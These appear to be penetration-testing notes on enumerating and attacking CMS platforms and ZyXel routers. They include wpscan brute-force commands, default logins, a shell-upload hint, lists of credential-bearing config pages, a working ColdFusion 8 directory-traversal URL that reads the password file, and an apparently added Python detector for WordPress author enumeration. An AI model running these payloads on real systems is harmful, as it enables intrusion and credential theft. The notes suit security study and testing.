CMS

  • Enumerate the version and a few other details

    • If the version cannot be found, download the source code and grep it for the version string. That may point to the page that contains the version.

  • Google the vulnerabilities for that version

  • Try default passwords on the login page

  • Try guessing passwords on the login page?

WordPress

WPScan

wpscan --url $ip/wp/

Bruteforce login page

wpscan --url <ip> --username <name> --wordlist <path to list>

Random agent

wpscan --url http://cybear32c.lab/ --random-agent

Zoom.py - enumerate WordPress users

python zoom.py -u <wordpress site>

Admin page

/wp-admin
/wp-login

Configuration files

setup-config.php
wp-config.php

Enumerate users

/?author=1, /?author=2,
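
From the defender's side, the /?author=N enumeration above shows up in web access logs as one client requesting several distinct author IDs. The following is an added example, not part of the original notes, that flags that pattern; the combined log format, the threshold of 3 and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Combined log format: client IP, identity, user, [timestamp], "METHOD target PROTO"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')


def author_ids(target):
    """Return the numeric author IDs requested via ?author=N, else an empty list."""
    query = parse_qs(urlsplit(target).query)
    return [int(v) for v in query.get("author", []) if v.isascii() and v.isdigit()]


def find_author_enumeration(lines, threshold=3):
    """Map client IP -> sorted distinct author IDs for clients at or above threshold.

    A single ?author=N hit is normal (author archive links); several distinct
    IDs from one client is the enumeration pattern. threshold is an assumed value.
    """
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            seen[m.group(1)].update(author_ids(m.group(2)))
    return {ip: sorted(ids) for ip, ids in seen.items() if len(ids) >= threshold}


# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0',
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /?author=2 HTTP/1.1" 301 0',
    '198.51.100.20 - - [10/Jan/2024:10:00:02 +0000] "GET /?author=2 HTTP/1.1" 301 0',
    '203.0.113.7 - - [10/Jan/2024:10:00:02 +0000] "GET /?author=3 HTTP/1.1" 404 0',
    '198.51.100.20 - - [10/Jan/2024:10:00:05 +0000] "GET /?p=12&author=abc HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Jan/2024:10:00:03 +0000] "GET /?author=4 HTTP/1.1" 404 0',
    'not a log line',
]

if __name__ == "__main__":
    for ip, ids in find_author_enumeration(SAMPLE_LOG).items():
        print(f"possible author enumeration from {ip}: IDs {ids}")
```
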

Drupal

Droopescan

droopescan scan drupal -u http://example.org/ -t 32

Find version

/CHANGELOG.txt

Adobe ColdFusion

Determine version

/CFIDE/adminapi/base.cfc?wsdl

Version 8 Vulnerability

  • fckeditor

  • LFI

    http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

Elastix

  • Google the vulnerabilities

  • Default login is admin:admin at /vtigercrm/

  • Able to upload a shell via the profile photo

Joomla

  • Admin page - /administrator

  • Configuration files

    configuration.php
    diagnostics.php
    joomla.inc.php
    config.inc.php

Mambo

Config files

configuration.php
config.inc.php  

ZyXel

Configuration files

/WAN.html (contains PPPoE ISP password) 
/WLAN_General.html and /WLAN.html (contains WEP key) 
/rpDyDNS.html (contains DDNS credentials) 
/Firewall_DefPolicy.html (Firewall) 
/CF_Keyword.html (Content Filter) 
/RemMagWWW.html (Remote MGMT) 
/rpSysAdmin.html (System) 
/LAN_IP.html (LAN) 
/NAT_General.html (NAT) 
/ViewLog.html (Logs) 
/rpFWUpload.html (Tools) 
/DiagGeneral.html (Diagnostic) 
/RemMagSNMP.html (SNMP Passwords) 
/LAN_ClientList.html (Current DHCP Leases) 

# Config Backups
/RestoreCfg.html
/BackupCfg.html 
